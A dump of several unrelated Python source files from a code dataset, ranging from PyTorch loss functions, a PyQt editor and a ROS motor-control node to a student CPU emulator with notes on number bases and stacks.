:return: scalar\n \"\"\"\n # input_soft = F.softmax(input, dim=1)\n target = target.type(torch.long)\n y_2 = torch.mean(self.dice_loss(input, target))\n if weight is None:\n y_1 = torch.mean(self.cross_entropy_loss.forward(input, target))\n else:\n y_1 = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(input, target), weight))\n return y_1 + y_2\n\n\nclass CombinedLoss_KLdiv(_Loss):\n \"\"\"\n A combination of dice and cross entropy loss\n \"\"\"\n\n def __init__(self):\n super(CombinedLoss_KLdiv, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n\n def forward(self, input, target, weight=None):\n \"\"\"\n Forward pass\n\n \"\"\"\n input, kl_div_loss = input\n # input_soft = F.softmax(input, dim=1)\n y_2 = torch.mean(self.dice_loss(input, target))\n if weight is None:\n y_1 = torch.mean(self.cross_entropy_loss.forward(input, target))\n else:\n y_1 = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(input, target), weight))\n return y_1, 
y_2, kl_div_loss\n\n\n# Credit to https://github.com/clcarwin/focal_loss_pytorch\nclass FocalLoss(nn.Module):\n \"\"\"\n Focal Loss for Dense Object Detection\n \"\"\"\n\n def __init__(self, gamma=2, alpha=None, size_average=True):\n\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.alpha = alpha\n if isinstance(alpha, (float, int)):\n self.alpha = torch.Tensor([alpha, 1 - alpha])\n if isinstance(alpha, list):\n self.alpha = torch.Tensor(alpha)\n self.size_average = size_average\n\n def forward(self, input, target):\n \"\"\"Forward pass\n\n :param input: shape = NxCxHxW\n :type input: torch.tensor\n :param target: shape = NxHxW\n :type target: torch.tensor\n :return: loss value\n :rtype: torch.tensor\n \"\"\"\n\n if input.dim() > 2:\n # N,C,H,W => N,C,H*W\n input = input.view(input.size(0), input.size(1), -1)\n input = input.transpose(1, 2) # N,C,H*W => N,H*W,C\n input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => N*H*W,C\n target = target.view(-1, 1)\n\n logpt = F.log_softmax(input, dim=1)\n logpt = logpt.gather(1, target)\n logpt = logpt.view(-1)\n pt = Variable(logpt.data.exp())\n\n if self.alpha is not None:\n if self.alpha.type() != input.data.type():\n self.alpha = self.alpha.type_as(input.data)\n at = self.alpha.gather(0, target.data.view(-1))\n logpt = logpt * Variable(at)\n\n loss = -1 * (1 - pt) ** self.gamma * logpt\n if self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nclass KLDCECombinedLoss(nn.Module):\n \"\"\"\n Combined loss of KL-Divergence and CrossEntropy.\n \"\"\"\n\n def __init__(self, gamma_value=1, beta_value=1.1):\n super(KLDCECombinedLoss, self).__init__()\n self.cross_entropy_loss = CrossEntropyLoss2d()\n self.dice_loss = DiceLoss()\n self.beta_value = beta_value\n self.gamma_value = gamma_value\n\n def forward(self, inp, target, weight=(None, None)):\n \"\"\"\n\n :param inp: tuple with (prior, posterior, predicted_y), prior, posterior can be dict for multi-layer KLDiv.\n :param target: Tensor (Ground truth)\n :param weight: Tuple, (None, None) | (False, False) | (weights, class_weights) and any mix\n :return: dice_loss, CE_loss, KL_div_loss, total_loss\n \"\"\"\n prior, posterior, y_p = inp\n if target is not None:\n target = target.type(torch.long)\n\n dice_loss = torch.tensor([0]).type(torch.FloatTensor)\n cross_entropy_loss = torch.tensor([0]).type(torch.FloatTensor)\n kl_div_loss = torch.tensor([0]).type(torch.FloatTensor)\n criterion = nn.KLDivLoss(reduction='batchmean')\n w, cw = weight\n if w is None:\n dice_loss = torch.mean(self.dice_loss(y_p, target))\n elif w is not False:\n dice_loss = torch.mean(torch.mul(self.dice_loss(y_p, target), w))\n\n if cw is None:\n cross_entropy_loss = torch.mean(self.cross_entropy_loss.forward(y_p, target))\n elif cw is not False:\n cross_entropy_loss = torch.mean(\n torch.mul(self.cross_entropy_loss.forward(y_p, target), cw))\n\n if prior is not None and posterior is not None:\n if type(prior) is dict and type(posterior) is dict:\n for i, j in zip(prior, posterior):\n # kl_div_loss += criterion(F.log_softmax(posterior[j].type(torch.FloatTensor), dim=0),\n # F.softmax(prior[i].type(torch.FloatTensor), dim=0))\n kl_div_loss += self.loss_to_normal(posterior[j]) + self.loss_to_normal(prior[i])\n else:\n\n # kl_div_loss = criterion(F.log_softmax(posterior.type(torch.FloatTensor), dim=0),\n # F.softmax(prior.type(torch.FloatTensor), dim=0))\n kl_div_loss += self.loss_to_normal(posterior) + self.loss_to_normal(prior)\n\n if posterior is not None and prior is None:\n kl_div_loss = 
posterior\n\n        dice_loss = dice_loss.cuda(0)\n        cross_entropy_loss = cross_entropy_loss.cuda(0)\n        kl_div_loss = kl_div_loss.cuda(0)\n\n        cumulative_loss = dice_loss + cross_entropy_loss + kl_div_loss\n\n        cumulative_loss = cumulative_loss.cuda(0)\n\n        return dice_loss, cross_entropy_loss, kl_div_loss, cumulative_loss\n\n    def loss_to_normal(self, tup):\n        mu, logvar = tup\n        mu, logvar = mu.type(torch.FloatTensor), logvar.type(torch.FloatTensor)\n        KLD_ = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n        return KLD_\n    \nclass KLDivLossFunc(nn.Module):\n\n    def __init__(self, beta_value=1):\n        super(KLDivLossFunc, self).__init__()\n        self.beta_value = beta_value\n\n    def forward(self, inp, target):\n        \"\"\"Forward pass\n        :param inp: input data tensor\n        :type inp: torch.tensor\n        :param target: shape = NxHxW\n        :type target: torch.tensor\n        :return: combined loss value\n        :rtype: torch.tensor\n        \"\"\"\n        criterion = nn.KLDivLoss(reduction='batchmean')\n        kldivloss = criterion(F.log_softmax(target.type(torch.FloatTensor), dim=0),\n                              F.softmax(inp.type(torch.FloatTensor), dim=0)).cuda()\n\n        return kldivloss\n\n    @staticmethod\n    def loss_to_normal(z_mu, z_var):\n        kl_loss = 0.5 * torch.sum(torch.exp(z_var) + z_mu ** 2 - 1. - z_var)\n        return kl_loss\n\n","sub_path":"build/lib/nn_common_modules/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"19533145","text":"\"\"\"\nThe idea here is fairly simple. The first condition to satisfy is that the total amount of gas must be at least the total amount consumed on the route; otherwise the full circuit is impossible.\nThen look for a starting point: when a station has enough gas to reach the next one, treat it as a candidate start, drive onwards, and see whether the full circuit can be completed; if not, find the next viable starting point and continue.\nTraversing this way by brute force is O(n^2), though, and a suitable greedy strategy can optimize it.\nThink about it for a moment: if we start from A and fail at B, then since the surplus from A to A+1 is >= 0, starting from any point between A and B leaves us with even less fuel by B, so no point between A and B can reach B either.\nSo we can simply pick B as the next candidate start. This greatly reduces the number of starting points to try and saves a lot of time.\n\"\"\"\nclass Solution(object):\n    def canCompleteCircuit(self, gas, cost):\n        \"\"\"\n        :type gas: List[int]\n        :type cost: List[int]\n        :rtype: int\n        \"\"\"\n        if sum(gas) - sum(cost) < 0:\n            return -1\n        l = len(gas)\n        i = 0\n        while i < l:\n            if gas[i] - cost[i] >= 0:\n                remain = 0\n                j = 0\n                start = i\n                for j in range(i, i + l):\n                    remain += (gas[j % l] - cost[j % l])\n                    if remain < 0:\n                        i = j % l\n                        if i < start:\n                            return -1\n                        break\n                if j == start + l - 1:\n                    return start\n            i += 1\n        return -1\n\n\nif __name__ == '__main__':\n    sol = Solution()\n    gas = [1, 2, 3, 4, 5]\n    cost = [3, 4, 5, 1, 2]\n    print(sol.canCompleteCircuit(gas, cost))\n","sub_path":"101-200/134.py","file_name":"134.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"184074934","text":"# A simple online-store shopping system\nfrom bll import handles\nfrom dal import shopping_goods_data\n\n\ndef shopping():\n\n\n    prompt = \"Hello, welcome to the chipscoco online shopping system. Enter a command from <> below to use the system:\\n\" \\\n             \"<1>: list all goods\\n<2>: sort goods by price (asc = ascending, desc = descending)\\n\" \\\n             \"<3>: add goods to the cart\\n<4>: view the cart\\n<5>: remove a given item from the cart\\n<6>: check out\\n<0>: exit\"\n\n    commands = {1: handles.show_all_goods, 2: handles.sort_goods, 3: handles.add_goods, 4: handles.show_shopping_cart,\n                5: handles.remove_goods, 6: handles.shopping_cart_paybill }\n    # commands maps each numeric command id to its handler function\n\n    while True:\n        print(prompt)\n        command = int(input(\"Enter a command: __\\b\\b\"))\n        if command in commands:\n            commands[command](shopping_goods_data.CHIPSCOCO)\n            # since shopping_goods_data was split out into its own module,\n            # CHIPSCOCO now has to be referenced through the module name\n        elif command == 0:\n            break\n        else:\n            print(\"That is not a valid command\")\n        input(\"Press any key to keep using the system......\")\n\n\nif __name__ == \"__main__\":\n
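    # entry point: run the interactive shopping loop until the user enters 0\n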
shopping()\n","sub_path":"chipsprange/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"466803598","text":"import random\r\n\r\nx = random.randint(1, 6)\r\ny = random.random()\r\n\r\nmyList = ['rock', 'paper', 'scissors']\r\nresult = random.choice(myList)\r\nprint(result)\r\ncards = [1,2,3,4,5,6,7,8,9, \"J\", \"Q\", \"K\", \"A\"]\r\n\r\nrandom.shuffle(cards)\r\n\r\nprint(cards)","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"407926796","text":"import sys\nimport argparse\nimport time\n\nsys.path.append(\"/home/hadoop/hiro_tests/\")\nimport hiroStatAndMatchDefault as hiro\n\nparser = argparse.ArgumentParser(description=\"Outputs default Hiro stat and match tests from input file\")\nparser.add_argument(\"--s3loc\", help=\"Match file. Should be only one column\")\nparser.add_argument(\"--ticket\", help=\"The relevant JIRA ticket. To be used for saving match_test outputs\")\nparser.add_argument(\"--test\", default=\"all\", choices=[\"stat\",\"match\",\"all\"], help=\"Type of test desired. Choices: [stat,match,all]. Default is all\")\nparser.add_argument(\"--htype\", default=\"md5\", choices=[\"md5\",\"sha1\",\"sha2\"], help=\"Type of hem in the original client file\")\nargs = parser.parse_args()\n\nif args.ticket:\n ticket = args.ticket\nelse:\n timeId = str(int(time.time()))\n ticket = 'noTicket_%s' %(timeId)\n\nif args.htype:\n htype = args.htype\nelse:\n htype = 'md5'\n\nclientTest = hiro.defaultTest(clientFile=args.s3loc, ticket=ticket, hem=htype)\n\nif args.test == 'stat':\n clientTest.stat_test()\nelif args.test == 'match':\n clientTest.match_test()\nelse:\n clientTest.stat_test()\n clientTest.match_test()","sub_path":"emr_scripts/hiro_tests/hiroTerminal.py","file_name":"hiroTerminal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254049345","text":"import mpids.MPInumpy as mpi_np\nimport numpy as np\nfrom mpi4py import MPI\nfrom operations import _max, _mean, _sum, _std\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n n_procs = comm.Get_size()\n size = 2**25\n iters = 1\n mpi_np_arr = mpi_np.arange(size, dtype=np.float64)\n\n max_time = _max(mpi_np_arr, iters=iters)\n mean_time = _mean(mpi_np_arr, iters=iters)\n sum_time = _sum(mpi_np_arr, iters=iters)\n std_time = _std(mpi_np_arr, iters=iters)\n\n if rank == 0:\n print(\"mpi_np,max,%d,%d,%.9f\" %(n_procs, size, max_time))\n print(\"mpi_np,mean,%d,%d,%.9f\" %(n_procs, size, mean_time))\n print(\"mpi_np,sum,%d,%d,%.9f\" %(n_procs, size, sum_time))\n print(\"mpi_np,std,%d,%d,%.9f\" %(n_procs, size, std_time))\n","sub_path":"MPInumpy/Strong/reductions_mpi_np.py","file_name":"reductions_mpi_np.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113151606","text":"from PyQt5.QtCore import Qt, pyqtSlot\n\nfrom resources.ui.python.ParticipantWidget_ui import Ui_frmParticipant\nfrom libopenimu.models.Participant import Participant\nfrom libopenimu.qt.DataEditor import DataEditor\n\n\nclass ParticipantWindow(DataEditor):\n\n participant = Participant()\n dbMan = None\n\n def __init__(self, dbManager, participant=None, parent=None, default_group = 
None):\n super().__init__(parent=parent)\n self.UI = Ui_frmParticipant()\n self.UI.setupUi(self)\n\n self.participant = participant\n self.dbMan = dbManager\n self.data_type = \"participant\"\n\n # Signals / Slots connections\n self.UI.btnCancel.clicked.connect(self.cancel_clicked)\n self.UI.btnSave.clicked.connect(self.save_clicked)\n self.UI.txtName.textEdited.connect(self.name_edited)\n self.UI.txtDesc.textChanged.connect(self.desc_edited)\n self.UI.cmbGroups.currentIndexChanged.connect(self.group_edited)\n\n # Load groups\n groups = self.dbMan.get_all_groups()\n self.UI.cmbGroups.clear()\n self.UI.cmbGroups.addItem(\"Aucun\", userData=None)\n\n for group in groups:\n self.UI.cmbGroups.addItem(group.name, userData=group.id_group)\n\n # Update data\n self.update_data()\n\n # Set default group for new participants\n if default_group is not None:\n self.UI.cmbGroups.setCurrentIndex(self.UI.cmbGroups.findData(default_group.id_group, Qt.UserRole))\n\n self.enable_buttons(False)\n\n def validate(self):\n rval = True\n if self.UI.txtName.text() == '':\n self.UI.txtName.setStyleSheet('background-color: #ffcccc;')\n rval = False\n else:\n self.UI.txtName.setStyleSheet('background-color: rgba(226, 226, 226, 90%);')\n\n if self.UI.cmbGroups.currentIndex == -1:\n rval = False\n\n return rval\n\n def update_data(self):\n if self.participant is not None:\n self.UI.txtName.setText(self.participant.name)\n self.UI.txtDesc.setPlainText(self.participant.description)\n # if self.participant.group is not None and self.participant.group.name is not None:\n # self.UI.lblGroupValue.setText(self.participant.group.name)\n # else:\n # self.UI.lblGroupValue.setText(\"Aucun\")\n self.UI.cmbGroups.setCurrentIndex(self.UI.cmbGroups.findData(self.participant.id_group))\n else:\n self.UI.txtName.setText(\"\")\n self.UI.txtDesc.setPlainText(\"\")\n self.UI.cmbGroups.setCurrentIndex(0)\n\n def enable_buttons(self, enable):\n self.UI.btnCancel.setEnabled(enable or self.participant is None)\n self.UI.btnSave.setEnabled(enable)\n\n def update_modified_status(self):\n self.enable_buttons(\n (self.participant is not None and self.UI.txtName.text() != self.participant.name) or\n (self.participant is None and self.UI.txtName.text() != \"\") or\n (self.participant is not None and self.UI.txtDesc.toPlainText() != self.participant.description) or\n (self.participant is None and self.UI.txtDesc.toPlainText() != \"\") or\n (self.participant is not None and self.UI.cmbGroups.currentData() != self.participant.id_group)\n )\n @pyqtSlot()\n def save_clicked(self):\n if self.validate():\n if self.participant is None:\n self.participant = Participant()\n self.participant.name = self.UI.txtName.text()\n self.participant.description = self.UI.txtDesc.toPlainText()\n self.participant.id_group = self.UI.cmbGroups.currentData()\n self.participant = self.dbMan.update_participant(self.participant)\n self.enable_buttons(False)\n self.dataSaved.emit()\n\n @pyqtSlot()\n def cancel_clicked(self):\n self.update_data()\n self.dataCancelled.emit()\n\n @pyqtSlot(str)\n def name_edited(self, new_value):\n self.update_modified_status()\n\n @pyqtSlot()\n def desc_edited(self):\n self.update_modified_status()\n\n @pyqtSlot()\n def group_edited(self):\n self.update_modified_status()","sub_path":"python/libopenimu/qt/ParticipantWindow.py","file_name":"ParticipantWindow.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483988336","text":"import pytest\n\nfrom 
.steps.get_games_by_user_uc_steps import ShouldGetTypeGamesByUserSteps\nfrom src.bp.domain import TypeGame\n\nTYPE_GAMES__RETURN_DATA = [\n {\n TypeGame(1, \"game1\", \"image1\", \"ARCADE\", \"PSICO\", \"20\", \"Puntos\"),\n TypeGame(2, \"game2\", \"image2\", \"ARCADE\", \"ING\", \"10\", \"Puntos\"),\n TypeGame(3, \"game3\", \"image3\", \"ARCADE\", \"MED\", \"30\", \"Puntos\"),\n }\n]\n\nUSER_ID_DATA = \"test_user_get_type_games\"\n\n\n@pytest.mark.parametrize(\n \"user_id, type_games\", [(USER_ID_DATA, TYPE_GAMES__RETURN_DATA)]\n)\ndef test_should_get_all_type_question(user_id, type_games):\n steps = ShouldGetTypeGamesByUserSteps()\n steps.given(user_id, type_games)\n steps.when()\n steps.then()\n","sub_path":"tests/bptest/get_type_games_by_user_use_case_test.py","file_name":"get_type_games_by_user_use_case_test.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449510894","text":"#!/usr/bin/env python\n\nimport serial\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nimport time\nleft_speed = \"\"\nright_speed = \"\"\nmotor_1_string = \"\"\nmotor_2_string = \"\"\nmotor_max_val = 2047; #define the maximum speed for a given motor\n\nser = serial.Serial(port = \"/dev/ttyACM0\",baudrate = 9600)\nif ser.isOpen:\n\tser.write(\"M1: \"+str(0)+\"\\r\\n\") #ensure that motors are stopped when the node is initialized\n\tser.write(\"M2: \"+str(0)+\"\\r\\n\") #ensure that motors are stopped when the node is initialized\nser.close()\nser.open()\n\ndef message_cb(data):\n# rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.data)\n left_speed = (data.linear.x - data.angular.z)*2047;\n left_speed = min(motor_max_val,left_speed); #set to max if it goes over\n left_speed = max(-motor_max_val,left_speed); #set to max if it goes over\n ser.write(\"M1: \" + str(int(left_speed)) + \"\\r\\n\")\n # rospy.loginfo(\"left_speed: \" + str(left_speed));\n\n # rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data.data)\n right_speed = (data.linear.x + data.angular.z)*2047;\n right_speed = min(motor_max_val,right_speed); #set to max if it goes over\n right_speed = max(-motor_max_val,right_speed); #set to max if it goes over\n ser.write(\"M2: \" + str(int(right_speed)) + \"\\r\\n\")\n # rospy.loginfo(\"right_speed: \" + str(right_speed));\n\ndef listener():\n rospy.init_node('sabertooth_control', anonymous=True)\n rospy.Subscriber(\"cmd_vel\", Twist, message_cb)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\nif __name__ == '__main__':\n #with serial.Serial(port = \"/dev/ttyACM0\",baudrate = 9600) as ser: \n# while True:\n listener()\n # motor_1_string = \"M1: \" + left_speed + \"\\r\\n\"\n # motor_2_string = \"M2: \" + right_speed + \"\\r\\n\"\n #ser.write(\"M1: \"+left_speed+\"\\r\\n\")\n\t #ser.write(\"M2: \"+right_speed+\"\\r\\n\")\n\t #ser.write(motor_1_string)\n #ser.write(motor_2_string)\n","sub_path":"plow_motor_control_py/scripts/sabertooth_drive.py","file_name":"sabertooth_drive.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"361722658","text":"import numpy as np\n\n\nclass MultiLayerPerceptron():\n def __init__(self, inputs, targets, n_hidden, beta):\n self.n_data = len(inputs)\n self.inputs = np.concatenate((inputs, -np.ones((self.n_data, 1))), axis=1)\n self.targets = targets\n self.n_in = inputs.shape[1] # Number of 
attributes\n self.n_out = targets.shape[1] # Number of outputs\n self.n_hidden = n_hidden # Number of hidden neurons\n self.beta = beta\n\n self.weights1 = np.random.randn(self.n_in + 1, n_hidden) * 0.1 - 0.05\n self.weights2 = np.random.randn(self.n_hidden + 1,\n self.n_out) * 0.1 - 0.05\n\n def train(self, eta, iterations):\n\n for n in range(iterations):\n\n self.outputs = self.fwd(self.inputs)\n error = 0.5 * sum((self.targets - self.outputs)**2)\n print(\"Iteration: \" + str(n) + '\\t' + \"Error: \" + str(error))\n\n deltao = (self.outputs - self.targets) * self.outputs * (1.0 - self.outputs)\n deltah = self.hidden * (1.0 - self.hidden) * \\\n np.dot(-deltao, np.transpose(self.weights2))\n\n updatew1 = np.zeros((np.shape(self.weights1)))\n updatew2 = np.zeros((np.shape(self.weights2)))\n\n updatew1 = eta * np.dot(np.transpose(self.inputs), deltah[:, :-1])\n updatew2 = eta * np.dot(np.transpose(self.hidden), deltao)\n\n self.weights1 += updatew1\n self.weights2 -= updatew2\n\n def fwd(self, inputs):\n\n # If inputs are not the same as inputs stored in the nn object add column of ones\n if not np.array_equal(inputs, self.inputs):\n inputs = np.concatenate((inputs, -np.ones((len(inputs), 1))), axis=1)\n\n self.hidden = np.dot(inputs, self.weights1)\n self.hidden = 1.0 / (1.0 + np.exp(-self.beta * self.hidden))\n self.hidden = np.concatenate((self.hidden, -np.ones((inputs.shape[0], 1))), axis=1)\n outputs = np.dot(self.hidden, self.weights2)\n outputs = 1.0 / (1.0 + np.exp(-self.beta * outputs))\n\n return outputs\n\n def confmat(self, inputs, outputs):\n \"\"\"\n UNFINISHED\n \"\"\"\n\n nn_outputs = np.where(self.fwd(inputs) > 0.5, 1, 0)\n\n return nn_outputs\n","sub_path":"src/ml_algorithms/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343454405","text":"\"\"\"\nNumber Bases\n_________________________________\n\nIt's the \"language\" that a number is written down in\n\nDouze(french) == (english)Twelve\nsame thing!!\n\n1100(binary) == 12 \nsame thing!!\n\nbase 2: binary\nbase 8: Octal(rarely used)\nbase 10: decimal (what we know from grade school)\nbase 16: hexadecimal \"hex\"\nbase 64: base 64\n\nbase 10(decimal)\n\n\n\n\n|<----- 1000's place 10^3\n||<----- 100's place 10^2\n|||<---- 10's place 10^1\n||||<---- 1's place 10^0\nabcd\n1234\n1 1000\n2 100s\n3 10s\n4 1s\n\n1234 = 1 * 1000 + 2 * 100 + 3 + 10 + 4 * 1\n ^ ^ ^ ^\n\n\nFor Hexadecimal, our digits are represented\nby 0-9, and then A-F\nand each place value is the next 16th power\n\nHere's a binary conversion\n\n|<----- 8's place 2^3\n||<----- 4's place 2^2\n|||<---- 2's place 2^1\n||||<---- 1's place 2^0\nabcd\n\n0011 binary\n\n0011 binary == 0 * 8 + 0 * 4 + 1 * 2 + 1 * 1 == 3 decimal\n\n*** FOR ANY NUMBER BASE, YOU CAN PUT ANY NUMBER OF LEADING 0'S***\n\nbinary digits == (\"bit\")\n\n8 bits == \"byte\"\n\nOne byte is the most common standard unit of memory used for our CPU\n\n4 bits == \"nybble\"\n\nThe number base only matters\nwhen you write the number down.\nOnce it's inside of a machine, the\nnumber base doesn't matter.\n\nDefault languages work in base 10 most of the time.\n\nTo specify the base in code:\nPrefix\n______\n[none] decimal\n0b binary\n0x hex\n0o octal\n\nbases only matter when you want to print it out\nall numeric values are simply numeric values\nwritten in one language or another\n\nAs the base number gets bigger, \nthe amount of digits required to represent\na numerical value goes 
down.\n\n4 bits(One nybble) are(is) required to store\none hex digit.\n\n\nConverting from binary to hex is very easy!\nNybbles align the digit counting between binary and hexadecimal very well.\nWhen converting, just chop up a binary number into 4's\nand then translate!\n\"\"\"\n\n# Beej's Emulator\n# Memory works like a giant array\n# Think of your RAM as a massive Array\n# In the computer, we have a RAM which contains memory\n\n\n# Index into the memory array\n# Address\n# Location\n# Pointer\n# The above all mean the same thing!!\n\n# For Tonight's assignment, do this in base 2 instead of base 10\n# The above code prints all lines of a given file\n# it'll print line by line, but we still need to make sure\n# to avoid all whitespace\n# avoid all comments\n# avoid all blank lines\n# print out errors for non-commands\n\nmemory = [0] * 256\n\n# This is a \"Data Driven\" program.\n# We have to pass in a file to this program in order to get output\n\nimport sys\n\nif len(sys.argv) !=2:\n print(\"usage: comp.py filename\")\n sys.exit(1)\n\ntry:\n address = 0\n\n with open(sys.argv[1]) as f:\n for line in f:\n t = line.split('#')\n n = t[0].strip()\n\n try:\n\n n = int(n)\n except ValueError:\n print(f\"Invalid Number {n}\")\n sys.exit(1)\n if n == '':\n continue\n\n print(repr(n))\n memory[address] = n\n address += 1\n\nexcept FileNotFoundError:\n print(f\"File not found: {sys.argv[1]}\")\n sys.exit()\n\nregister = [0] * 8 # represent r0 - r7\n\n# \"Variables\" in hardware, known as \"registers\"\n# There are a fixed number of registers\n# They have fixed names\n# On the LS8, they're called...\n# R1 R2 R3 R4 R5 R6 R7\n\n\npc = 0# Program Counter, address of the currently-executing instruction\n# Give the register for the stack pointer a symbolic name\n# So that developers know where it is\nSP = 7\nregister[SP] = 0xF4\n\ndef push_value(value):\n # Decrement SP\n register[SP] -= 1\n\n # copy the value to the SP address\n top_of_stack_addr = register[SP]\n memory[top_of_stack_addr] = value\n\n\ndef pop_value():\n \n # Get the top of stack addr\n top_of_stack_addr = register[SP]\n\n # Get the value of the top of stack\n value = memory[top_of_stack_addr]\n\n # Increment SP\n register[SP] += 1\n\n return value\n\n\n\nrunning = True\n\nwhile running:\n ir = memory[pc] # Instruction Register\n # This holds a copy of the currently executing instruction\n \n if ir == 1:\n print(\"David\")\n pc += 1\n elif ir == 2:\n running = False\n\n elif ir == 3: # Save Reg\n reg_num = memory[pc + 1]\n value = memory[pc + 2]\n register[reg_num] = value\n print(register)\n pc += 3\n\n elif ir == 4: # Print_reg\n reg_num = memory[pc + 1]\n print(register[reg_num])\n pc += 2\n\n elif ir == 5: # PUSH\n # Get the reg num to push\n reg_num = memory[pc + 1]\n\n # Get the value to push\n value = register[reg_num]\n\n push_value(value)\n\n # print(memory[0xea:0xf4])\n\n pc += 2\n\n elif ir == 6: # POP\n # Get the reg to pop into\n reg_num = memory[pc + 1]\n\n value = pop_value()\n\n #Store the value in the register\n register[reg_num] = value\n\n # Increment SP\n register[SP] += 1\n\n pc += 2\n\n print(memory[0xea:0xf4])\n\n elif ir == CALL:\n\n # Compute the return addr\n return_addr = pc + 2\n\n # Push the return addr on stack\n push_value(return_addr)\n\n # get the value from the operand reg\n reg_num = memory[pc + 1]\n value = register[reg_num]\n\n # set the pc to that value\n pc = value\n\n else:\n print(f\"Unknown Instruction {ir}\")\n\n\n# For moving the PC, use an if else statement which checks\n# the fourth bit of 
the instruction. If that fourth bit is\n# true, the instruction sets the PC itself and we leave the PC alone.\n# If that fourth bit is false, advance the PC past the instruction and its\n# operands as usual.\n\n\n\n# inst_sets_pc = ((ir >> 4) & 1) == 1\n\n\n# if not inst_sets_pc:\n\n#_________________________________________________\n# Instruction location\n# \"POP register\"\n# copy the value from the address pointed to by the stack pointer,\n# put it in the given register\n# increment the SP (stack works top-down)\n#_____________________________________________\n# Instruction location\n# \"PUSH register\"\n# Decrement the stack pointer\n# place the value from the given register at the address the SP now points to\n# Stack pointer points at the item most recently pushed\n#\n\n\n### The above is a very basic emulation\n### Memory has numbers. Those numbers\n# have meaning, and we can tell the computer\n# what those meanings are.\n\n# Interrupts are a stretch goal\n\n\n#______________________________________________________________\n# Frame the Plan from Inputs to Outputs\n# Parsing, normalizing and sanitizing\n# all mean the same thing:\n# take the data, and make it into the same format\n\n\n#____________________________________________________________\n# CPU Stack notes\n\n# These are just like the stack data structure we know\n\n# Push and Pop are standard\n\n# Stack data is stored in RAM\n\n# The \"Stack Pointer\" keeps track of the address of the top of the stack.\n\n# Typically the stack grows down from the higher memory addresses\n\n#__________________________\n# A Minimal Stack\n\n# A stack needs somewhere to store data: RAM in this case\n\n# A stack needs to keep track of where the top of the stack is: stack pointer\n\n# A stack needs functionality to push and pop, like always. Push and pop instructions\n\n# In order to store something (PUSH)\n# we first decrement the stack pointer,\n# then write the value to the memory address which the stack pointer is pointing at\n# Decrement stack pointer -> push value to that address\n\n# In order to remove something (POP)\n# we POP it into a register:\n# read the value at the stack pointer and copy it into the register,\n# then increment the stack pointer\n# First copy the value into the register, then increment the SP\n# This doesn't erase the value from RAM; it just copies it to a register\n# Pushing onto the stack is what overwrites old values\n\n# The stack is typically used to store variables\n# Also used to return addresses from a subroutine\n# Storage of registers and CPU state while handling an interrupt\n# Allocation of local variables for a subroutine\n\n# If you PUSH too many items on the stack, you'll begin to\n# overwrite values\n\n# If you POP from an empty stack, you'll copy whatever happens to be at that\n# address into a register\n\n# Check if a stack is empty by trying to POP from it\n\n# What information must be saved on the stack when the CPU is servicing\n# an interrupt? Why? The current state of the processor, and all of its\n# counters, registers, and flags.
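#\n# (A minimal sketch of that save step, reusing the push_value() helper defined\n# earlier; exactly which registers get saved here is an assumption, not LS8 spec:)\n#\n#   for reg_num in range(7):            # R0-R6\n#       push_value(register[reg_num])\n#   push_value(pc)                      # so execution can resume afterwards\n#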
This is all saved so that it can\n# handle the interruption and then pick back up where it left off\n\n\n#________________________________________________________________\n# CPU Interrupts\n\n# Interrupts are commonly generated by peripherals(keyboard, mouse)\n# who need to alert the CPU that some work needs to be done.\n\n# When an interrupt occurs, the current state of the processor is saved\n# on the stack, and execution continues at the address of the interrupt handler.\n\n# Most CPU's have a lookup table: Interrupt Vector Table.\n# This is an array of interrupts to tell the PC how to handle each one.\n# It's an array of pointers to handlers, one per interrupt.\n# Different CPU's keep the table in different areas of RAM\n\n#______________________________________________________\n# Beej's notes\n\n# Stacks are ALWAYS USED for CPU's\n\n# Stack is good for:\n\n# Temporarily storing values\n# Making subroutines possible\n# Implementing local variables\n\n\n# It's easy to implement in the CPU hardware\n\n\n# Conditionals are what we're missing from our emulator\n\n# How does the stack work?\n\n# Low level Stack concept will be used. Boil the stack down\n# to it's purest essence. In the case of a CPU, we just need\n# to be able to push and pop. memory and location is handled by RAM.\n# The stack pointer points to the top of the stack.\n# The stack pointer is a general purpose register\n\n# Stacks start from TOP-DOWN\n# if it's empty, it always points to the top(f4)\n#_________________________________________________\n# Instruction location\n# \"POP register\"\n# copy the value from the address pointed to by the stack pointer,\n# put it at the given register\n# increment the SP(Stack works 